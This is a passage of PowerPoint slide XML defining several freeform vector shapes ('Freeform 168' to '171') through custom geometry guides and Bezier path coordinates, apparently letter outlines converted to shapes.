                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD28A2D4-4A24-4458-BB40-23EA527FF2C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId68"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5859464" y="3065463"/>
              <a:ext cx="98425" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 131 w 234"/>
                <a:gd name="T1" fmla="*/ 142 h 304"/>
                <a:gd name="T2" fmla="*/ 188 w 234"/>
                <a:gd name="T3" fmla="*/ 30 h 304"/>
                <a:gd name="T4" fmla="*/ 199 w 234"/>
                <a:gd name="T5" fmla="*/ 30 h 304"/>
                <a:gd name="T6" fmla="*/ 219 w 234"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 199 w 234"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 147 w 234"/>
                <a:gd name="T11" fmla="*/ 0 h 304"/>
                <a:gd name="T12" fmla="*/ 127 w 234"/>
                <a:gd name="T13" fmla="*/ 14 h 304"/>
                <a:gd name="T14" fmla="*/ 150 w 234"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 115 w 234"/>
                <a:gd name="T17" fmla="*/ 103 h 304"/>
                <a:gd name="T18" fmla="*/ 76 w 234"/>
                <a:gd name="T19" fmla="*/ 30 h 304"/>
                <a:gd name="T20" fmla="*/ 98 w 234"/>
                <a:gd name="T21" fmla="*/ 14 h 304"/>
                <a:gd name="T22" fmla="*/ 78 w 234"/>
                <a:gd name="T23" fmla="*/ 0 h 304"/>
                <a:gd name="T24" fmla="*/ 26 w 234"/>
                <a:gd name="T25" fmla="*/ 0 h 304"/>
                <a:gd name="T26" fmla="*/ 5 w 234"/>
                <a:gd name="T27" fmla="*/ 14 h 304"/>
                <a:gd name="T28" fmla="*/ 26 w 234"/>
                <a:gd name="T29" fmla="*/ 30 h 304"/>
                <a:gd name="T30" fmla="*/ 37 w 234"/>
                <a:gd name="T31" fmla="*/ 30 h 304"/>
                <a:gd name="T32" fmla="*/ 97 w 234"/>
                <a:gd name="T33" fmla="*/ 142 h 304"/>
                <a:gd name="T34" fmla="*/ 31 w 234"/>
                <a:gd name="T35" fmla="*/ 274 h 304"/>
                <a:gd name="T36" fmla="*/ 20 w 234"/>
                <a:gd name="T37" fmla="*/ 274 h 304"/>
                <a:gd name="T38" fmla="*/ 0 w 234"/>
                <a:gd name="T39" fmla="*/ 289 h 304"/>
                <a:gd name="T40" fmla="*/ 20 w 234"/>
                <a:gd name="T41" fmla="*/ 304 h 304"/>
                <a:gd name="T42" fmla="*/ 72 w 234"/>
                <a:gd name="T43" fmla="*/ 304 h 304"/>
                <a:gd name="T44" fmla="*/ 92 w 234"/>
                <a:gd name="T45" fmla="*/ 289 h 304"/>
                <a:gd name="T46" fmla="*/ 69 w 234"/>
                <a:gd name="T47" fmla="*/ 274 h 304"/>
                <a:gd name="T48" fmla="*/ 115 w 234"/>
                <a:gd name="T49" fmla="*/ 177 h 304"/>
                <a:gd name="T50" fmla="*/ 164 w 234"/>
                <a:gd name="T51" fmla="*/ 274 h 304"/>
                <a:gd name="T52" fmla="*/ 141 w 234"/>
                <a:gd name="T53" fmla="*/ 289 h 304"/>
                <a:gd name="T54" fmla="*/ 161 w 234"/>
                <a:gd name="T55" fmla="*/ 304 h 304"/>
                <a:gd name="T56" fmla="*/ 213 w 234"/>
                <a:gd name="T57" fmla="*/ 304 h 304"/>
                <a:gd name="T58" fmla="*/ 234 w 234"/>
                <a:gd name="T59" fmla="*/ 289 h 304"/>
                <a:gd name="T60" fmla="*/ 213 w 234"/>
                <a:gd name="T61" fmla="*/ 274 h 304"/>
                <a:gd name="T62" fmla="*/ 202 w 234"/>
                <a:gd name="T63" fmla="*/ 274 h 304"/>
                <a:gd name="T64" fmla="*/ 131 w 234"/>
                <a:gd name="T65" fmla="*/ 14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4" h="304">
                  <a:moveTo>
                    <a:pt x="131" y="142"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="188" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="30"/>
                    <a:pt x="219" y="30"/>
                    <a:pt x="219" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="0"/>
                    <a:pt x="206" y="0"/>
                    <a:pt x="199" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="147" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="0"/>
                    <a:pt x="127" y="0"/>
                    <a:pt x="127" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="30"/>
                    <a:pt x="138" y="30"/>
                    <a:pt x="150" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="30"/>
                    <a:pt x="98" y="30"/>
                    <a:pt x="98" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="85" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="30"/>
                    <a:pt x="18" y="30"/>
                    <a:pt x="26" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="37" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="12" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="304"/>
                    <a:pt x="92" y="304"/>
                    <a:pt x="92" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="274"/>
                    <a:pt x="80" y="274"/>
                    <a:pt x="69" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="274"/>
                    <a:pt x="141" y="274"/>
                    <a:pt x="141" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="304"/>
                    <a:pt x="154" y="304"/>
                    <a:pt x="161" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="213" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="304"/>
                    <a:pt x="234" y="304"/>
                    <a:pt x="234" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="274"/>
                    <a:pt x="221" y="274"/>
                    <a:pt x="213" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="14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7" name="Freeform 168">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32F4DE28-AC64-4914-8F26-67C5F87AFEEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId69"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5975351" y="3062288"/>
              <a:ext cx="88900" cy="138113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 121 w 209"/>
                <a:gd name="T1" fmla="*/ 174 h 316"/>
                <a:gd name="T2" fmla="*/ 177 w 209"/>
                <a:gd name="T3" fmla="*/ 230 h 316"/>
                <a:gd name="T4" fmla="*/ 116 w 209"/>
                <a:gd name="T5" fmla="*/ 285 h 316"/>
                <a:gd name="T6" fmla="*/ 58 w 209"/>
                <a:gd name="T7" fmla="*/ 270 h 316"/>
                <a:gd name="T8" fmla="*/ 34 w 209"/>
                <a:gd name="T9" fmla="*/ 227 h 316"/>
                <a:gd name="T10" fmla="*/ 17 w 209"/>
                <a:gd name="T11" fmla="*/ 209 h 316"/>
                <a:gd name="T12" fmla="*/ 0 w 209"/>
                <a:gd name="T13" fmla="*/ 230 h 316"/>
                <a:gd name="T14" fmla="*/ 0 w 209"/>
                <a:gd name="T15" fmla="*/ 295 h 316"/>
                <a:gd name="T16" fmla="*/ 15 w 209"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 33 w 209"/>
                <a:gd name="T19" fmla="*/ 293 h 316"/>
                <a:gd name="T20" fmla="*/ 115 w 209"/>
                <a:gd name="T21" fmla="*/ 316 h 316"/>
                <a:gd name="T22" fmla="*/ 209 w 209"/>
                <a:gd name="T23" fmla="*/ 228 h 316"/>
                <a:gd name="T24" fmla="*/ 185 w 209"/>
                <a:gd name="T25" fmla="*/ 168 h 316"/>
                <a:gd name="T26" fmla="*/ 113 w 209"/>
                <a:gd name="T27" fmla="*/ 136 h 316"/>
                <a:gd name="T28" fmla="*/ 72 w 209"/>
                <a:gd name="T29" fmla="*/ 127 h 316"/>
                <a:gd name="T30" fmla="*/ 32 w 209"/>
                <a:gd name="T31" fmla="*/ 80 h 316"/>
                <a:gd name="T32" fmla="*/ 92 w 209"/>
                <a:gd name="T33" fmla="*/ 30 h 316"/>
                <a:gd name="T34" fmla="*/ 161 w 209"/>
                <a:gd name="T35" fmla="*/ 93 h 316"/>
                <a:gd name="T36" fmla="*/ 178 w 209"/>
                <a:gd name="T37" fmla="*/ 107 h 316"/>
                <a:gd name="T38" fmla="*/ 196 w 209"/>
                <a:gd name="T39" fmla="*/ 86 h 316"/>
                <a:gd name="T40" fmla="*/ 196 w 209"/>
                <a:gd name="T41" fmla="*/ 20 h 316"/>
                <a:gd name="T42" fmla="*/ 181 w 209"/>
                <a:gd name="T43" fmla="*/ 0 h 316"/>
                <a:gd name="T44" fmla="*/ 162 w 209"/>
                <a:gd name="T45" fmla="*/ 23 h 316"/>
                <a:gd name="T46" fmla="*/ 93 w 209"/>
                <a:gd name="T47" fmla="*/ 0 h 316"/>
                <a:gd name="T48" fmla="*/ 0 w 209"/>
                <a:gd name="T49" fmla="*/ 82 h 316"/>
                <a:gd name="T50" fmla="*/ 64 w 209"/>
                <a:gd name="T51" fmla="*/ 160 h 316"/>
                <a:gd name="T52" fmla="*/ 121 w 209"/>
                <a:gd name="T53" fmla="*/ 17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9" h="316">
                  <a:moveTo>
                    <a:pt x="121" y="174"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="177"/>
                    <a:pt x="177" y="187"/>
                    <a:pt x="177" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="256"/>
                    <a:pt x="155" y="285"/>
                    <a:pt x="116" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="285"/>
                    <a:pt x="78" y="283"/>
                    <a:pt x="58" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="256"/>
                    <a:pt x="35" y="235"/>
                    <a:pt x="34" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="218"/>
                    <a:pt x="33" y="209"/>
                    <a:pt x="17" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="209"/>
                    <a:pt x="0" y="220"/>
                    <a:pt x="0" y="230"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="295"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="303"/>
                    <a:pt x="0" y="316"/>
                    <a:pt x="15" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="316"/>
                    <a:pt x="29" y="309"/>
                    <a:pt x="33" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="308"/>
                    <a:pt x="84" y="316"/>
                    <a:pt x="115" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="316"/>
                    <a:pt x="209" y="272"/>
                    <a:pt x="209" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="196"/>
                    <a:pt x="191" y="175"/>
                    <a:pt x="185" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="148"/>
                    <a:pt x="151" y="145"/>
                    <a:pt x="113" y="136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="127"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="121"/>
                    <a:pt x="32" y="103"/>
                    <a:pt x="32" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="54"/>
                    <a:pt x="57" y="30"/>
                    <a:pt x="92" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="30"/>
                    <a:pt x="158" y="77"/>
                    <a:pt x="161" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="104"/>
                    <a:pt x="168" y="107"/>
                    <a:pt x="178" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="107"/>
                    <a:pt x="196" y="96"/>
                    <a:pt x="196" y="86"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="196" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="13"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="181" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="0"/>
                    <a:pt x="166" y="9"/>
                    <a:pt x="162" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="6"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="93" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="0"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="115"/>
                    <a:pt x="23" y="148"/>
                    <a:pt x="64" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="161"/>
                    <a:pt x="115" y="172"/>
                    <a:pt x="121" y="17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8" name="Freeform 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D6309F-2B50-490B-8E35-DCA65B758DE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId70"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6084889" y="3062288"/>
              <a:ext cx="88900" cy="138113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 122 w 210"/>
                <a:gd name="T1" fmla="*/ 174 h 316"/>
                <a:gd name="T2" fmla="*/ 177 w 210"/>
                <a:gd name="T3" fmla="*/ 230 h 316"/>
                <a:gd name="T4" fmla="*/ 117 w 210"/>
                <a:gd name="T5" fmla="*/ 285 h 316"/>
                <a:gd name="T6" fmla="*/ 58 w 210"/>
                <a:gd name="T7" fmla="*/ 270 h 316"/>
                <a:gd name="T8" fmla="*/ 35 w 210"/>
                <a:gd name="T9" fmla="*/ 227 h 316"/>
                <a:gd name="T10" fmla="*/ 18 w 210"/>
                <a:gd name="T11" fmla="*/ 209 h 316"/>
                <a:gd name="T12" fmla="*/ 0 w 210"/>
                <a:gd name="T13" fmla="*/ 230 h 316"/>
                <a:gd name="T14" fmla="*/ 0 w 210"/>
                <a:gd name="T15" fmla="*/ 295 h 316"/>
                <a:gd name="T16" fmla="*/ 15 w 210"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 34 w 210"/>
                <a:gd name="T19" fmla="*/ 293 h 316"/>
                <a:gd name="T20" fmla="*/ 116 w 210"/>
                <a:gd name="T21" fmla="*/ 316 h 316"/>
                <a:gd name="T22" fmla="*/ 210 w 210"/>
                <a:gd name="T23" fmla="*/ 228 h 316"/>
                <a:gd name="T24" fmla="*/ 186 w 210"/>
                <a:gd name="T25" fmla="*/ 168 h 316"/>
                <a:gd name="T26" fmla="*/ 113 w 210"/>
                <a:gd name="T27" fmla="*/ 136 h 316"/>
                <a:gd name="T28" fmla="*/ 73 w 210"/>
                <a:gd name="T29" fmla="*/ 127 h 316"/>
                <a:gd name="T30" fmla="*/ 33 w 210"/>
                <a:gd name="T31" fmla="*/ 80 h 316"/>
                <a:gd name="T32" fmla="*/ 93 w 210"/>
                <a:gd name="T33" fmla="*/ 30 h 316"/>
                <a:gd name="T34" fmla="*/ 162 w 210"/>
                <a:gd name="T35" fmla="*/ 93 h 316"/>
                <a:gd name="T36" fmla="*/ 179 w 210"/>
                <a:gd name="T37" fmla="*/ 107 h 316"/>
                <a:gd name="T38" fmla="*/ 196 w 210"/>
                <a:gd name="T39" fmla="*/ 86 h 316"/>
                <a:gd name="T40" fmla="*/ 196 w 210"/>
                <a:gd name="T41" fmla="*/ 20 h 316"/>
                <a:gd name="T42" fmla="*/ 181 w 210"/>
                <a:gd name="T43" fmla="*/ 0 h 316"/>
                <a:gd name="T44" fmla="*/ 163 w 210"/>
                <a:gd name="T45" fmla="*/ 23 h 316"/>
                <a:gd name="T46" fmla="*/ 93 w 210"/>
                <a:gd name="T47" fmla="*/ 0 h 316"/>
                <a:gd name="T48" fmla="*/ 0 w 210"/>
                <a:gd name="T49" fmla="*/ 82 h 316"/>
                <a:gd name="T50" fmla="*/ 65 w 210"/>
                <a:gd name="T51" fmla="*/ 160 h 316"/>
                <a:gd name="T52" fmla="*/ 122 w 210"/>
                <a:gd name="T53" fmla="*/ 17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0" h="316">
                  <a:moveTo>
                    <a:pt x="122" y="174"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="177"/>
                    <a:pt x="177" y="187"/>
                    <a:pt x="177" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="256"/>
                    <a:pt x="156" y="285"/>
                    <a:pt x="117" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="285"/>
                    <a:pt x="78" y="283"/>
                    <a:pt x="58" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="256"/>
                    <a:pt x="35" y="235"/>
                    <a:pt x="35" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="218"/>
                    <a:pt x="34" y="209"/>
                    <a:pt x="18" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="209"/>
                    <a:pt x="0" y="220"/>
                    <a:pt x="0" y="230"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="295"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="303"/>
                    <a:pt x="0" y="316"/>
                    <a:pt x="15" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="316"/>
                    <a:pt x="29" y="309"/>
                    <a:pt x="34" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="308"/>
                    <a:pt x="84" y="316"/>
                    <a:pt x="116" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="316"/>
                    <a:pt x="210" y="272"/>
                    <a:pt x="210" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="196"/>
                    <a:pt x="192" y="175"/>
                    <a:pt x="186" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="148"/>
                    <a:pt x="152" y="145"/>
                    <a:pt x="113" y="136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="127"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="121"/>
                    <a:pt x="33" y="103"/>
                    <a:pt x="33" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="54"/>
                    <a:pt x="57" y="30"/>
                    <a:pt x="93" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="30"/>
                    <a:pt x="159" y="77"/>
                    <a:pt x="162" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="104"/>
                    <a:pt x="169" y="107"/>
                    <a:pt x="179" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="107"/>
                    <a:pt x="196" y="96"/>
                    <a:pt x="196" y="86"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="196" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="13"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="181" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="0"/>
                    <a:pt x="167" y="9"/>
                    <a:pt x="163" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="6"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="93" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="0"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="115"/>
                    <a:pt x="23" y="148"/>
                    <a:pt x="65" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="161"/>
                    <a:pt x="115" y="172"/>
                    <a:pt x="122" y="17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9" name="Freeform 170">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174BACA2-402F-4241-8AEC-9949E1739D1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId71"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6197601" y="3046413"/>
              <a:ext cx="85725" cy="169863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 203"/>
                <a:gd name="T1" fmla="*/ 30 h 388"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 186 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 168 w 203"/>
                <a:gd name="T7" fmla="*/ 14 h 388"/>
                <a:gd name="T8" fmla="*/ 4 w 203"/>
                <a:gd name="T9" fmla="*/ 358 h 388"/>
                <a:gd name="T10" fmla="*/ 0 w 203"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 17 w 203"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 35 w 203"/>
                <a:gd name="T15" fmla="*/ 374 h 388"/>
                <a:gd name="T16" fmla="*/ 199 w 203"/>
                <a:gd name="T17" fmla="*/ 3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388">
                  <a:moveTo>
                    <a:pt x="199" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="9"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="171" y="8"/>
                    <a:pt x="168" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="358"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="379"/>
                    <a:pt x="7" y="388"/>
                    <a:pt x="17" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="388"/>
                    <a:pt x="32" y="380"/>
                    <a:pt x="35" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199"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0" name="Freeform 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E63B87E-DC79-4E16-AFE3-F3E41AA1FCC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId72"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6307139" y="3101975"/>
              <a:ext cx="87313" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="222"/>
